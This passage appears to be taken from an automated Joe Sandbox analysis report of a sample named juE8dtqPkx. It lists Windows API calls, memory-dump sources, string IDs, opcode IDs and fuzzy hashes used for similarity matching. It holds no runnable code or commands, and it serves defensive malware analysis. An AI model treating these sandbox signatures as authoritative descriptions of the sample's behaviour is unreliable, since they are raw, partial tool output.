                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID: \$]$h
                                                    • API String ID: 4104443479-3262404753
                                                    • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                    • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                                                    • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                    • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                                                    APIs
                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                                                      • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                      • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                    • CloseHandle.KERNEL32(?), ref: 00457E09
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                                                    • String ID: <$@
                                                    • API String ID: 2417854910-1426351568
                                                    • Opcode ID: c74d9848bc40b82e3fbf7b03d3cfd3af39385c8d101f10b5b521061fd4332237
                                                    • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                                                    • Opcode Fuzzy Hash: c74d9848bc40b82e3fbf7b03d3cfd3af39385c8d101f10b5b521061fd4332237
                                                    • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
                                                    APIs
                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                                                      • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                    • String ID:
                                                    • API String ID: 3705125965-3916222277
                                                    • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                    • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                                                    • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                    • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                                                    APIs
                                                    • GetMenuItemInfoW.USER32 ref: 0045FAC4
                                                    • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                                                    • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Menu$Delete$InfoItem
                                                    • String ID: 0
                                                    • API String ID: 135850232-4108050209
                                                    • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                    • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                                                    • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                    • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                                                    APIs
                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Window$Long
                                                    • String ID: SysTreeView32
                                                    • API String ID: 847901565-1698111956
                                                    • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                    • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                                                    • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                    • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window
                                                    • String ID: SysMonthCal32
                                                    • API String ID: 2326795674-1439706946
                                                    • Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                    • Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
                                                    • Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                    • Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
                                                    APIs
                                                    • DestroyWindow.USER32(00000000), ref: 00450A2F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: DestroyWindow
                                                    • String ID: msctls_updown32
                                                    • API String ID: 3375834691-2298589950
                                                    • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                    • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                                                    • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                    • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID: $<
                                                    • API String ID: 4104443479-428540627
                                                    • Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                    • Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
                                                    • Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                    • Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                    • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$DiskFreeSpace
                                                    • String ID: \VH
                                                    • API String ID: 1682464887-234962358
                                                    • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                    • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                                                    • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                    • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                    • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$DiskFreeSpace
                                                    • String ID: \VH
                                                    • API String ID: 1682464887-234962358
                                                    • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                    • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                                                    • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                    • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                                                    • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$DiskFreeSpace
                                                    • String ID: \VH
                                                    • API String ID: 1682464887-234962358
                                                    • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                    • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                                                    • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                    • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                                                    • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                                                    • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$InformationVolume
                                                    • String ID: \VH
                                                    • API String ID: 2507767853-234962358
                                                    • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                    • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
                                                    • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                    • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                                                    • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                                                    • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$InformationVolume
                                                    • String ID: \VH
                                                    • API String ID: 2507767853-234962358
                                                    • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                    • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                                                    • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                    • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                                                    • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: msctls_trackbar32
                                                    • API String ID: 3850602802-1010561917
                                                    • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                    • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                                                    • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                    • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                                                    APIs
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                    • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                                                    • String ID: crts
                                                    • API String ID: 943502515-3724388283
                                                    • Opcode ID: 75fc9d2b20a0c1d41b1dbefb082d5918fb6b1a56ad17f55ff511dc9fe1167c88
                                                    • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                                                    • Opcode Fuzzy Hash: 75fc9d2b20a0c1d41b1dbefb082d5918fb6b1a56ad17f55ff511dc9fe1167c88
                                                    • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                                                    • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                                                    • SetErrorMode.KERNEL32(?), ref: 0045D35C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$LabelVolume
                                                    • String ID: \VH
                                                    • API String ID: 2006950084-234962358
                                                    • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                    • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
